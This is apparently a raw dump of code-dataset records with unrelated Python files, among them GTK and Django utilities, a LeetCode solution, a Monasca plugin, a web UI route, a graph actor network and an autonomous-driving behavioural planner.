conn.close()\n\n\n","sub_path":"sqlite/temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"61873522","text":"import gi\ngi.require_version('Gdk', '3.0')\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk\n\nfrom types import MethodType\n\n\ndef setup_info_bar(window):\n \"\"\"Create a Gtk.InfoBar on the bottom with an info label.\"\"\"\n window.info_bar = Gtk.InfoBar(no_show_all=True)\n window.info_msg = Gtk.Label(\"\")\n window.info_ok_btn = window.info_bar.add_button(\"OK\", Gtk.ResponseType.OK)\n window.show_message = MethodType(show_message, window)\n\n content_area = window.info_bar.get_content_area()\n content_area.add(window.info_msg)\n\n window.info_bar.connect('response', MethodType(on_info_bar_response, window))\n window.info_bar.hide()\n window.info_msg.show()\n\ndef on_info_bar_response(self, info_bar, response_id):\n info_bar.hide()\n\ndef show_message(self, message):\n self.info_msg.set_text(message)\n self.info_bar.show()\n self.info_ok_btn.grab_focus()\n","sub_path":"gui/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"417571182","text":"# Examine the code given to you. Determine what arguments must be passed into\n# isX1 and isX2 respectively to obtain an output of true for both, and pass in\n# the arguments accordingly.\n\nx = 3\n\n\ndef isX1(num):\n x = 5\n return num == x\n\n\ndef isX2(num):\n return num == x\n\n\none = isX1() # add code in parentheses\ntwo = isX2() # add code in parentheses\n\nprint(one) # true\nprint(two) # true\n","sub_path":"01_Functions_and_Execution_Context/03-passingArguments.py","file_name":"03-passingArguments.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"162694248","text":"from typing import List\n\n\nclass Solution:\n def find_first_bigger(self, heaters: List[int], left: int, right: int, target: int) -> int:\n while left < right:\n mid = left + int((right - left) / 2)\n if heaters[mid] >= target:\n right = mid\n else:\n left = mid + 1\n return left\n\n def findRadius(self, houses: List[int], heaters: List[int]) -> int:\n heaters.sort()\n min_rad = -1\n for house in houses:\n right_option = self.find_first_bigger(heaters, 0, len(heaters) - 1, house)\n left_option = right_option - 1\n if left_option < 0:\n new_rad = abs(heaters[right_option] - house)\n else:\n new_rad = min(abs(heaters[right_option] - house), abs(heaters[left_option] - house))\n min_rad = max(min_rad, new_rad)\n return min_rad","sub_path":"leetcode/2nd_Round/475.py","file_name":"475.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"454299588","text":"import logging\n\nimport monasca_setup.agent_config\nimport monasca_setup.detection\n\nlog = logging.getLogger(__name__)\n\n\nclass HostAlive(monasca_setup.detection.ArgsPlugin):\n \"\"\" Set up a host_alive check according to the passed in args.\n Despite being a detection plugin this plugin does no detection and will be a noop without arguments.\n Expects two space-separated arguments, hostname and type. Type can be either 'ssh' or 'ping'. 
For example:\n 'monasca-setup -d hostalive -a \"hostname=remotebox type=ping\"'\n \"\"\"\n\n def _detect(self):\n \"\"\"Run detection, set self.available True if the service is detected.\n \"\"\"\n self.available = self._check_required_args(['hostname', 'type'])\n\n def build_config(self):\n \"\"\"Build the config as a Plugins object and return.\n \"\"\"\n config = monasca_setup.agent_config.Plugins()\n log.info(\"\\tEnabling {type} host check for {hostname}\".format(**self.args))\n # Since the naming in the args and in the config doesn't match, build_instance is only good for dimensions\n instance = self._build_instance([])\n instance.update({'name': \"{hostname} {type}\".format(**self.args),\n 'host_name': self.args['hostname'],\n 'alive_test': self.args['type']})\n config['host_alive'] = {'init_config': None, 'instances': [instance]}\n\n return config\n\n","sub_path":"monasca_setup/detection/plugins/host_alive.py","file_name":"host_alive.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"273530496","text":"from django.conf.urls import url\nfrom . import views\nfrom django.views.generic import RedirectView\n\napp_name = 'my_exrate'\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^my_exrate/$', views.index, name='index'),\n url(r'^login$', views.user_login, name='user_login'),\n url(r'^logout$', views.user_logout, name='user_logout'),\n url(r'^register$', views.register, name='register'),\n url(r'^(?P[a-z]{2})$', views.lang_change, name='lang_change'),\n url(r'^user_register$', views.user_register, name='user_register'),\n url(r'^user_check$', views.user_check, name='user_check'),\n url(r'^favicon\\.ico$', RedirectView.as_view(url='/static/image/favicon.ico')),\n # url(r'^(?P[0-9]+)/$', views.detail, name='detail'),\n url(r'^(?P[0-9]+)/results/$', views.results, name='results'),\n url(r'^(?P[0-9]+)/vote/$', views.vote, name='vote'),\n url(r'^(?P[0-9]+)/matplotlib', views.matplotlib, name='matplotlib'),\n url(r'^(?P[0-9]+)/plotly', views.plotly, name='plotly'),\n url(r'^(?P[0-9]+)/rate_by_week', views.rate_by_week, name='rate_by_week'),\n url(r'^rate_by_day$', views.rate_by_day, name='rate_by_day'),\n # url(r'^my_exrate/amcharts/$', views.amcharts, name='amcharts'),\n url(r'^(?P[0-9]+)/amcharts$', views.amcharts, name='amcharts'),\n url(r'^my_exrate/csv_file/$', views.csv_file, name='csv_file'),\n url(r'^my_exrate/rate_select/$', views.rate_select, name='rate_select'),\n url(r'^my_exrate/rate_insert/$', views.rate_insert, name='rate_insert'),\n url(r'^my_exrate/rate_delete/$', views.rate_delete, name='rate_delete'),\n url(r'^my_exrate/rate_update/$', views.rate_update, name='rate_update'),\n url(r'^server_upd$', views.server_upd, name='server_upd'),\n]\n","sub_path":"my_exrate/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"77228924","text":"from xml.etree import ElementTree\n\nfrom PySide.QtGui import *\nimport requests\nimport view\nimport sys\n\nclass Controller(QWidget):\n\n def __init__(self, parent=None):\n \"\"\"\n The constructor.\n \"\"\"\n super().__init__(parent)\n self.myForm = view.Ui_Form()\n self.myForm.setupUi(self)\n\n def submit(self):\n headers = {\"content-type\": \"application/json\"}\n params = {\"origin\": self.myForm.start.text(), \"destination\": self.myForm.ziel.text(), \"language\": \"de\", \"sensor\": \"false\"}\n res = 
requests.get(\"http://maps.googleapis.com/maps/api/directions/json\", params, headers=headers)\n instructions = \"\"\n res2 = res.json()\n for key in res2[\"duration\"]:\n instructions += key\n\n self.myForm.textBrowser.setHtml(instructions)\n\n def reset(self):\n self.myForm.start.setText(\"\")\n self.myForm.ziel.setText(\"\")\n self.myForm.textBrowser.setHtml(\"\")\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n c = Controller()\n c.show()\n sys.exit(app.exec_())","sub_path":"Rest2/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"562483247","text":"from app import apfell, links, use_ssl\nfrom sanic import response\nfrom jinja2 import Environment, PackageLoader\nfrom sanic_jwt.decorators import scoped, inject_user\nfrom app.routes.routes import respect_pivot\nimport urllib.parse\n\nenv = Environment(loader=PackageLoader('app', 'templates'))\n\n\n@apfell.route(\"/apiui/command_help\")\n@inject_user()\n@scoped(['auth:user', 'auth:apitoken_user'], False) # user or user-level api token are ok\nasync def apiui_command_help(request, user):\n template = env.get_template('apiui_command_help.html')\n if len(request.query_args) != 0:\n data = urllib.parse.unquote(request.query_args[0][1])\n print(data)\n else:\n data = \"\"\n if use_ssl:\n content = template.render(links=await respect_pivot(links, request), name=user['username'], http=\"https\",\n ws=\"wss\", config=user['ui_config'], view_utc_time=user['view_utc_time'], agent=data)\n else:\n content = template.render(links=await respect_pivot(links, request), name=user['username'], http=\"http\",\n ws=\"ws\", config=user['ui_config'], view_utc_time=user['view_utc_time'], agent=data)\n return response.html(content)\n\n# add links to the routes in this file at the bottom\nlinks['apiui_command_help'] = apfell.url_for('apiui_command_help')\n","sub_path":"apfell-docker/app/routes/api_routes.py","file_name":"api_routes.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"76937558","text":"import torch\nimport torch.nn as nn\nfrom graph_utils import get_action_edges\nfrom networks.MLP import MultiLayerPerceptron as MLP\n\n\nclass GraphActor(nn.Module):\n def __init__(self,\n node_embed_dim: int,\n use_ef_init: bool,\n ef_init_dim: int):\n\n super(GraphActor, self).__init__()\n self.node_embed_dim = node_embed_dim\n self.use_ef_init = use_ef_init\n self.ef_init_dim = ef_init_dim\n self.actor_input_dim = self.node_embed_dim * 2 + self.use_ef_init * self.ef_init_dim\n self.actor = MLP(input_dimension=self.actor_input_dim,\n output_dimension=1,\n num_neurons=[],\n out_activation='ReLU', )\n\n def actor_func(self, edges):\n if self.use_ef_init:\n policy_input = [edges.src['node_feature'], edges.dst['node_feature'], edges.data['ef_init']]\n else:\n policy_input = [edges.src['node_feature'], edges.dst['node_feature']]\n policy_input = torch.cat(policy_input, dim=1)\n logits = self.actor(policy_input) # shape [n_actions x 1]\n action_probs = logits.softmax(0) # shape [n_actions x 1]\n return {'action_probs': action_probs}\n\n def forward(self, graph, node_feature):\n graph.ndata['node_feature'] = node_feature\n action_edges = get_action_edges(graph)\n graph.apply_edges(func=self.actor_func, edges=action_edges)\n action_probs = graph.edges[action_edges].data['action_probs'] # shape [n_actions x 1]\n action_probs = 
action_probs.squeeze(dim=1) # shape [n_actions]\n\n _ = graph.ndata.pop('node_feature')\n _ = graph.edata.pop('action_probs')\n\n return action_probs\n","sub_path":"networks/GraphActor.py","file_name":"GraphActor.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"284405578","text":"#!/usr/bin/env python3\nimport numpy as np\nimport math\nfrom traffic_light_detector import TrafficLightState\nfrom utils import transform_world_to_ego_frame, to_rot, rotate_z, rotate_x\nfrom enum import Enum\n\n###############################################################################\n# DECLARATION OF FSM STATES\n###############################################################################\nclass FSMState(Enum):\n FOLLOW_LANE = 0\n DECELERATE_AND_STOP = 1\n STOP_FOR_OBSTACLES = 2\n\n###############################################################################\n# DECLARATION OF USEFUL CONSTANTS\n###############################################################################\nDIST_TO_TL = 15 # distance (m) for evaluating nearest traffic light to stop at \nDIST_STOP_TL = 4 # minimum distance (m) from the traffic light to which we want to stop for a RED light\nTL_Y_POS = 3.5 # distance (m) on the Y axis for the traffic light check.\nDIST_TO_PEDESTRIAN = 3 # distance (m) from the nearest pedestrian within we have to stop\n\n###############################################################################\n# DECLARATION OF MAIN CLASS FOR BP PLANNER\n###############################################################################\nclass BehaviouralPlanner:\n def __init__(self, lookahead, lead_vehicle_lookahead):\n self._lookahead = lookahead # distance (m) for looking at next waypoint\n self._follow_lead_vehicle_lookahead = lead_vehicle_lookahead # distance (m) for looking at a lead vehicle\n self._state = FSMState.FOLLOW_LANE # current state of the FSM which implements the bp\n self._follow_lead_vehicle = False # flag used in order to indicate if there's a lead vehicle to be followed\n self._obstacle_on_lane = False # flag used in order to indicate if there's an entity crossing our trajectory\n self._goal_state = [0.0, 0.0, 0.0] # x-y-speed of the next waypoint to reach\n self._goal_index = 0 # index of the next waypoint to reach\n self._lightstate = TrafficLightState.NO_TL # current state of the nearest traffic light\n\n self._depth_images = None # images of depth cameras -> format: {camera_name:image}\n self._current_box = None # current detected traffic light box -> format: {camera_name:box}\n self._cameras_params = {} # parameters of depth camera used in camera projection geometry -> format: {name:params}\n self._inv_intrinsic_matrices = {\"CameraDEPTH_TL\":None, \"CameraDEPTH_FRONT\":None} # inverse of intrinsic matrices used in camera projection geometry\n\n # Rotation matrix to align image frame to camera frame\n rotation_image_camera_frame = np.dot(rotate_z(-90 * math.pi /180),rotate_x(-90 * math.pi /180))\n\n image_camera_frame = np.zeros((4,4))\n image_camera_frame[:3,:3] = rotation_image_camera_frame\n image_camera_frame[:, -1] = [0, 0, 0, 1]\n\n # Lambda Function for transformation of image frame in camera frame \n self._image_to_camera_frame = lambda object_camera_frame: np.dot(image_camera_frame, object_camera_frame)\n \n def set_lookahead(self, lookahead):\n self._lookahead = lookahead\n\n def set_lightstate(self, lighstate):\n self._lightstate = lighstate\n\n def set_depth_imgs(self, 
depth_imgs):\n self._depth_images = depth_imgs\n \n def set_current_box(self, box):\n if box!=[]: self._current_box = box\n \n def set_cameras_params(self, depth_info):\n self._cameras_params = depth_info\n\n for k in list(depth_info.keys()):\n # Calculate Inverse Intrinsic Matrix for both depth cameras\n f = self._cameras_params[k][\"w\"] /(2 * math.tan(self._cameras_params[k][\"fov\"] * math.pi / 360))\n Center_X = self._cameras_params[k][\"w\"] / 2.0\n Center_Y = self._cameras_params[k][\"h\"] / 2.0\n\n intrinsic_matrix = np.array([[f, 0, Center_X],\n [0, f, Center_Y],\n [0, 0, 1]])\n\n self._inv_intrinsic_matrices[k]=np.linalg.inv(intrinsic_matrix)\n\n def get_tl_stop_goal(self, waypoints, ego_state, closest_index, goal_index):\n \"\"\"\n Checks whether the vehicle is near a traffic light and returns a waypoint index near it, or \n None if no suitable waypoint is found. The check is triggered within DIST_TO_TL (15) meters of the traffic light. \n If triggered, the waypoint located at most DIST_STOP_TL (4) meters from the intersection is chosen as the target waypoint\n so it is possible to stop at an acceptable distance.\n\n Args:\n waypoints: list of the waypoints on the path\n ego_state: (x, y, yaw, current_speed) of the vehicle\n closest_index: index of the nearest waypoint\n goal_index: index of the current goal waypoint\n\n Returns:\n [int]: index of the waypoint target\n \"\"\"\n \n # recover estimated TL location\n tl_pos = self.get_tl_pos()\n\n if tl_pos is not None:\n tl_pos = tl_pos[0]\n # For each waypoint from the closest to the goal we want to check if there is a traffic light that we have to manage\n for i in range(closest_index, goal_index):\n waypoint_loc_relative = transform_world_to_ego_frame(\n [waypoints[i][0], waypoints[i][1], 0],\n [ego_state[0], ego_state[1], 0.0],\n [0.0, 0.0, ego_state[2]]\n )\n # We calculate the distance between the current waypoint and the current traffic light\n dist_spot = np.linalg.norm(np.array([waypoint_loc_relative[0] - tl_pos[0], waypoint_loc_relative[1] - tl_pos[1]]))\n # If this distance is smaller than DIST_TO_TL, we spot the traffic light\n if dist_spot < DIST_TO_TL:\n # But we also check if it is ahead of ego or behind. If ahead, we choose a stop waypoint.\n if tl_pos[0] > 0 and tl_pos[1] <= TL_Y_POS:\n print(f\"TL ahead. 
Position: {tl_pos}\")\n for j in range(i, len(waypoints)):\n waypoint_loc_relative = transform_world_to_ego_frame(\n [waypoints[j][0], waypoints[j][1], waypoints[j][2]],\n [ego_state[0], ego_state[1], 0.0],\n [0.0, 0.0, ego_state[2]]\n )\n if np.linalg.norm(np.array([waypoint_loc_relative[0] - tl_pos[0], waypoint_loc_relative[1] - tl_pos[1]])) < DIST_STOP_TL:\n print(f\"TL Stop Waypoint: {j} {waypoints[j]}\")\n return j\n # Otherwise we stop checking.\n else:\n return None\n return None\n\n def get_tl_pos(self):\n \"\"\"This function estimates the position of the nearest traffic light, \n combining information from the detector and the depth cameras.\n\n Returns:\n position in the vehicle frame or None if no boxes are detected\n \"\"\"\n if self._current_box is None: return None # NO_TL\n\n cam_name = list(self._current_box.keys())[0] # name of the camera on which box is detected\n box = list(self._current_box.values())[0] # detected box\n # recover corresponding depth image info\n depth_image = self._depth_images[cam_name] \n inv_intrinsic_matrix = self._inv_intrinsic_matrices[cam_name]\n camera_params = self._cameras_params[cam_name]\n \n # recover box parameters\n xmin, ymin, xmax, ymax = box.get_bounds()\n xmin = xmin*400\n xmax = xmax*400\n ymin = ymin*400\n ymax = ymax*400\n\n # recover distance and pixel position of the TL\n depth = 1000 #Distance of the sky\n for i in range(int(xmin), int(xmax+1)):\n for j in range(int(ymin), int(ymax+1)):\n if j < 400 and i < 400:\n if depth > depth_image[j][i]:\n y = j\n x = i\n depth = depth_image[y][x]\n\n pixel = [x, y, 1]\n pixel = np.reshape(pixel, (3,1))\n \n depth = depth_image[y][x] * 1000 # Consider depth in meters \n\n if depth!=1000:\n # Projection Pixel to Image Frame\n image_frame_vect = np.dot(inv_intrinsic_matrix,pixel) * depth\n\n # Create extended vector\n image_frame_vect_extended = np.zeros((4,1))\n image_frame_vect_extended[:3] = image_frame_vect \n image_frame_vect_extended[-1] = 1\n\n # Projection Image to Camera Frame\n camera_frame = self._image_to_camera_frame(image_frame_vect_extended)\n camera_frame = camera_frame[:3]\n camera_frame = np.asarray(np.reshape(camera_frame, (1,3)))\n\n camera_frame_extended = np.zeros((4,1))\n camera_frame_extended[:3] = camera_frame.T \n camera_frame_extended[-1] = 1\n \n # Projection Camera to Vehicle Frame\n camera_to_vehicle_frame = np.zeros((4,4))\n camera_to_vehicle_frame[:3,:3] = to_rot([camera_params[\"pitch\"], camera_params[\"yaw\"], camera_params[\"roll\"]])\n camera_to_vehicle_frame[:,-1] = [camera_params[\"x\"], camera_params[\"y\"], camera_params[\"h\"], 1]\n\n vehicle_frame = np.dot(camera_to_vehicle_frame, camera_frame_extended)\n vehicle_frame = vehicle_frame[:3]\n vehicle_frame = np.asarray(np.reshape(vehicle_frame, (1,3)))\n\n return vehicle_frame\n else: return None\n \n def get_new_goal(self, waypoints, ego_state):\n \"\"\"This function computes the next goal waypoint, based on the current state of the vehicle\n\n Args:\n waypoints: list of the waypoints on the path\n ego_state: (x, y, yaw, current_speed) of the vehicle\n\n Returns:\n [tuple]: (closest_index, goal_index) of the waypoint targets\n \"\"\"\n # First, find the closest index to the ego vehicle.\n closest_len, closest_index = get_closest_index(waypoints, ego_state)\n\n # Next, find the goal index that lies within the lookahead distance along the waypoints.\n goal_index = self.get_goal_index(waypoints, ego_state, closest_len, closest_index)\n while goal_index < (len(waypoints) - 1) and waypoints[goal_index][2] <= 0.1:\n goal_index += 1\n\n return 
closest_index,goal_index\n\n def update_goal(self, waypoints, goal_index, speed=None):\n \"\"\"Updates the internal goal state given the waypoints and the goal index.\n\n Args:\n waypoints: list of the waypoints on the path\n goal_index: index of the waypoint target\n speed ([float], optional): speed to have in the goal waypoint. Defaults to None.\n \"\"\"\n self._goal_index = goal_index\n self._goal_state = waypoints[goal_index]\n\n if speed is not None:\n self._goal_state[2] = speed\n\n def transition_state(self, waypoints, ego_state, closed_loop_speed):\n \"\"\"Handles state transitions and computes the goal state. \n \n args:\n waypoints: current waypoints to track (global frame). \n length and speed in m and m/s.\n (includes speed to track at each x,y location.)\n format: [[x0, y0, v0],\n [x1, y1, v1],\n ...\n [xn, yn, vn]]\n example:\n waypoints[2][1]: \n returns the 3rd waypoint's y position\n\n waypoints[5]:\n returns [x5, y5, v5] (6th waypoint)\n ego_state: ego state vector for the vehicle. (global frame)\n format: [ego_x, ego_y, ego_yaw, ego_open_loop_speed]\n ego_x and ego_y : position (m)\n ego_yaw : top-down orientation [-pi to pi]\n ego_open_loop_speed : open loop speed (m/s)\n closed_loop_speed: current (closed-loop) speed for vehicle (m/s)\n variables to set:\n self._goal_index: Goal index for the vehicle to reach\n i.e. waypoints[self._goal_index] gives the goal waypoint\n self._goal_state: Goal state for the vehicle to reach (global frame)\n format: [x_goal, y_goal, v_goal]\n self._state: The current state of the vehicle.\n available states: \n FOLLOW_LANE : Follow the global waypoints (lane).\n DECELERATE_AND_STOP : Decelerate to stop.\n STOP_FOR_OBSTACLES : Stay stopped while there's an obstacle on the lane.\n \"\"\"\n # In this state, continue tracking the lane by finding the\n # goal index in the waypoint list that is within the lookahead\n # distance. 
Then, check to see if there's a pedestrian/vehicle that \n # intersects our trajectory, and in that case perform an emergency brake.\n # Otherwise check if there's a red traffic light; if there is, ensure\n # that the goal state enforces the car to be stopped DIST_STOP_TL m before the traffic light.\n if self._state == FSMState.FOLLOW_LANE:\n #print(\"State: FOLLOW_LANE\")\n\n closest_index,goal_index = self.get_new_goal(waypoints, ego_state)\n\n # if there's an agent that intersects our trajectory, stop immediately \n if self._obstacle_on_lane:\n self.update_goal(waypoints, goal_index, 0)\n print(\"State: FOLLOW_LANE -> STOP_FOR_OBSTACLES\")\n self._state = FSMState.STOP_FOR_OBSTACLES\n\n else:\n intersection_goal = None\n # if there's a red traffic light, get the waypoint within DIST_STOP_TL m of it\n if self._lightstate == TrafficLightState.STOP:\n intersection_goal = self.get_tl_stop_goal(waypoints, ego_state, closest_index, goal_index)\n \n if intersection_goal is not None:\n self.update_goal(waypoints, intersection_goal, 0)\n print(\"State: FOLLOW_LANE -> DECEL_AND_STOP\")\n self._state = FSMState.DECELERATE_AND_STOP\n else:\n self.update_goal(waypoints, goal_index)\n \n # In this state, check if there's an agent that intersects our trajectory, for stopping immediately;\n # otherwise, check whether the traffic light has become green or has disappeared from our view before returning to FOLLOW_LANE.\n # (the second case should not happen, but we handle it to avoid remaining blocked at a traffic light)\n elif self._state == FSMState.DECELERATE_AND_STOP:\n #print(\"State: DECELERATE_AND_STOP\")\n\n if self._obstacle_on_lane:\n print(\"State: DECEL_AND_STOP -> STOP_FOR_OBSTACLES\")\n self._state = FSMState.STOP_FOR_OBSTACLES\n\n elif self._lightstate == TrafficLightState.GO or self._lightstate == TrafficLightState.NO_TL:\n print(\"State: DECEL_AND_STOP -> FOLLOW_LANE\")\n self._state = FSMState.FOLLOW_LANE\n\n # in this state, check whether the agent has cleared our trajectory before returning to FOLLOW_LANE\n elif self._state == FSMState.STOP_FOR_OBSTACLES:\n #print(\"State: STOP_FOR_OBSTACLES\")\n if not self._obstacle_on_lane:\n print(\"State: STOP_FOR_OBSTACLES -> FOLLOW_LANE\")\n self._state = FSMState.FOLLOW_LANE\n\n else: raise ValueError('Invalid state value.')\n\n # Gets the goal index in the list of waypoints, based on the lookahead and\n # the current ego state. In particular, find the earliest waypoint that has accumulated\n # arc length (including closest_len) that is greater than or equal to self._lookahead.\n def get_goal_index(self, waypoints, ego_state, closest_len, closest_index):\n \"\"\"Gets the goal index for the vehicle. \n \n Set to be the earliest waypoint that has accumulated arc length\n (including closest_len) that is greater than or\n equal to self._lookahead.\n\n args:\n waypoints: current waypoints to track. (global frame)\n length and speed in m and m/s.\n (includes speed to track at each x,y location.)\n format: [[x0, y0, v0],\n [x1, y1, v1],\n ...\n [xn, yn, vn]]\n example:\n waypoints[2][1]: \n returns the 3rd waypoint's y position\n\n waypoints[5]:\n returns [x5, y5, v5] (6th waypoint)\n ego_state: ego state vector for the vehicle. (global frame)\n format: [ego_x, ego_y, ego_yaw, ego_open_loop_speed]\n ego_x and ego_y : position (m)\n ego_yaw : top-down orientation [-pi to pi]\n ego_open_loop_speed : open loop speed (m/s)\n closest_len: length (m) to the closest waypoint from the vehicle.\n closest_index: index of the waypoint which is closest to the vehicle.\n i.e. 
waypoints[closest_index] gives the waypoint closest to the vehicle.\n returns:\n wp_index: Goal index for the vehicle to reach\n i.e. waypoints[wp_index] gives the goal waypoint\n \"\"\"\n # Find the farthest point along the path that is within the\n # lookahead distance of the ego vehicle.\n # Take the distance from the ego vehicle to the closest waypoint into\n # consideration.\n arc_length = closest_len\n wp_index = closest_index\n\n # In this case, reaching the closest waypoint is already far enough for\n # the planner. No need to check additional waypoints.\n if arc_length > self._lookahead:\n return wp_index\n\n # We are already at the end of the path.\n if wp_index == len(waypoints) - 1:\n return wp_index\n\n # Otherwise, find our next waypoint.\n while wp_index < len(waypoints) - 1:\n arc_length += np.sqrt((waypoints[wp_index][0] - waypoints[wp_index + 1][0]) ** 2 + (\n waypoints[wp_index][1] - waypoints[wp_index + 1][1]) ** 2)\n if arc_length > self._lookahead:\n break\n wp_index += 1\n\n return wp_index % len(waypoints)\n \n # Checks to see if we need to modify our velocity profile to accommodate the lead vehicle.\n def check_for_lead_vehicle(self, ego_state, lead_car_position):\n \"\"\"Checks for lead vehicle within the proximity of the ego car, such\n that the ego car should begin to follow the lead vehicle.\n\n args:\n ego_state: ego state vector for the vehicle. (global frame)\n format: [ego_x, ego_y, ego_yaw, ego_open_loop_speed]\n ego_x and ego_y : position (m)\n ego_yaw : top-down orientation [-pi to pi]\n ego_open_loop_speed : open loop speed (m/s)\n lead_car_position: The [x, y] position of the lead vehicle.\n Lengths are in meters, and it is in the global frame.\n sets:\n self._follow_lead_vehicle: Boolean flag on whether the ego vehicle\n should follow (true) the lead car or not (false).\n \"\"\"\n # Check lead car position delta vector relative to heading, as well as\n # distance, to determine if car should be followed.\n # Check to see if lead vehicle is within range, and is ahead of us.\n if not self._follow_lead_vehicle:\n # Compute the angle between the normalized vector from the ego vehicle\n # to the lead vehicle and the ego vehicle's heading vector.\n lead_car_delta_vector = [lead_car_position[0] - ego_state[0], \n lead_car_position[1] - ego_state[1]]\n lead_car_distance = np.linalg.norm(lead_car_delta_vector)\n # In this case, the car is too far away. 
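No need to engage following yet.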
\n if lead_car_distance > self._follow_lead_vehicle_lookahead:\n return\n\n lead_car_delta_vector = np.divide(lead_car_delta_vector, \n lead_car_distance)\n ego_heading_vector = [math.cos(ego_state[2]), \n math.sin(ego_state[2])]\n # Check to see if the relative angle between the lead vehicle and the ego\n # vehicle lies within +/- 45 degrees of the ego vehicle's heading.\n if np.dot(lead_car_delta_vector, \n ego_heading_vector) < (1 / math.sqrt(2)):\n return\n\n self._follow_lead_vehicle = True\n\n else:\n lead_car_delta_vector = [lead_car_position[0] - ego_state[0], \n lead_car_position[1] - ego_state[1]]\n lead_car_distance = np.linalg.norm(lead_car_delta_vector)\n\n # Add a 15m buffer to prevent oscillations for the distance check.\n if lead_car_distance > self._follow_lead_vehicle_lookahead + 15:\n \n self._follow_lead_vehicle = False\n return\n # Check to see if the lead vehicle is still within the ego vehicle's\n # frame of view.\n lead_car_delta_vector = np.divide(lead_car_delta_vector, lead_car_distance)\n ego_heading_vector = [math.cos(ego_state[2]), math.sin(ego_state[2])]\n if np.dot(lead_car_delta_vector, ego_heading_vector) > (1 / math.sqrt(2)):\n return\n\n self._follow_lead_vehicle = False\n\n# Compute the waypoint index that is closest to the ego vehicle, and return\n# it as well as the distance from the ego vehicle to that waypoint.\ndef get_closest_index(waypoints, ego_state):\n \"\"\"Gets the index of the waypoint in the given list that is closest to the vehicle position.\n\n args:\n waypoints: current waypoints to track. (global frame)\n length and speed in m and m/s.\n (includes speed to track at each x,y location.)\n format: [[x0, y0, v0],\n [x1, y1, v1],\n ...\n [xn, yn, vn]]\n example:\n waypoints[2][1]: \n returns the 3rd waypoint's y position\n\n waypoints[5]:\n returns [x5, y5, v5] (6th waypoint)\n ego_state: ego state vector for the vehicle. (global frame)\n format: [ego_x, ego_y, ego_yaw, ego_open_loop_speed]\n ego_x and ego_y : position (m)\n ego_yaw : top-down orientation [-pi to pi]\n ego_open_loop_speed : open loop speed (m/s)\n\n returns:\n [closest_len, closest_index]:\n closest_len: length (m) to the closest waypoint from the vehicle.\n closest_index: index of the waypoint which is closest to the vehicle.\n i.e. waypoints[closest_index] gives the waypoint closest to the vehicle.\n \"\"\"\n closest_len = float('Inf')\n closest_index = 0\n\n for i in range(len(waypoints)):\n temp = (waypoints[i][0] - ego_state[0])**2 + (waypoints[i][1] - ego_state[1])**2\n if temp < closest_len:\n closest_len = temp\n closest_index = i\n closest_len = np.sqrt(closest_len)\n\n return closest_len, closest_index\n\n# Checks if p2 lies on segment p1-p3, if p1, p2, p3 are collinear. 
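Collinearity is not verified here; this is only a bounding-box containment test, so callers must establish it beforehand.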
\ndef pointOnSegment(p1, p2, p3):\n if (p2[0] <= max(p1[0], p3[0]) and (p2[0] >= min(p1[0], p3[0])) and \\\n (p2[1] <= max(p1[1], p3[1])) and (p2[1] >= min(p1[1], p3[1]))):\n return True\n else:\n return False\n","sub_path":"src/behavioural_planner.py","file_name":"behavioural_planner.py","file_ext":"py","file_size_in_byte":24122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"165604860","text":"\nimport cv2\nimport glob\nimport itertools\nimport math\nimport numpy as np\nimport os\nfrom numpy import random\nfrom PIL import Image, ImageDraw, ImageFilter, ImageFont\nfrom keras.optimizers import SGD\nfrom pathlib import Path\nfrom segmentation_models import Unet\nfrom segmentation_models.backbones import get_preprocessing\n\nfrom tqdm import tqdm\nimport panavatar\nfrom cairosvg import svg2png\nimport matplotlib.pyplot as plt\n\nimport segmentation_models as sm\n\nfrom keras.optimizers import Adam\nfrom segmentation_models import Unet\nfrom segmentation_models.backbones import get_preprocessing\nimport keras.utils\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\nimport sys\n\nimport numpy as np\nfrom constants import DATA_DIR, train_images_path, train_segs_path, test_images_path, test_segs_path, icons_paths,model_path, BACKBONE, size, target_icons\nnp.set_printoptions(threshold=sys.maxsize)\n\npreprocess_input = get_preprocessing(BACKBONE)\n\ndef preprocess_segmentation_image(img):\n img = img[:, :, 0]\n img = img / 255\n img = img.reshape((img.shape[0], img.shape[1], 1))\n return img\n\ndef preprocess_image(img):\n img = img.astype(np.float32)\n # caffe-style preprocessing, suitable for e.g. resnet.\n # subtract imagenet mean on each color channel\n img[:, :, 0] -= 103.939\n img[:, :, 1] -= 116.779\n img[:, :, 2] -= 123.68\n return img\n\ndef prepare_data(input_img_path, output_img_path, n_examples):\n os.makedirs(str(input_img_path), exist_ok=True)\n os.makedirs(str(output_img_path), exist_ok=True)\n\n img = Image.open('pokemon.png')\n img_bw = img.copy()\n img_array = np.array(img_bw)\n img_array[img_array[..., -1] != 0] = [255, 255, 255, 255]\n # img_array = cv2.medianBlur(img_array, 5)\n\n img_bw = Image.fromarray(img_array)\n\n # img_bw = img_bw.filter(ImageFilter.MedianFilter(size=3))\n for i in tqdm(range(n_examples)):\n svg_code = 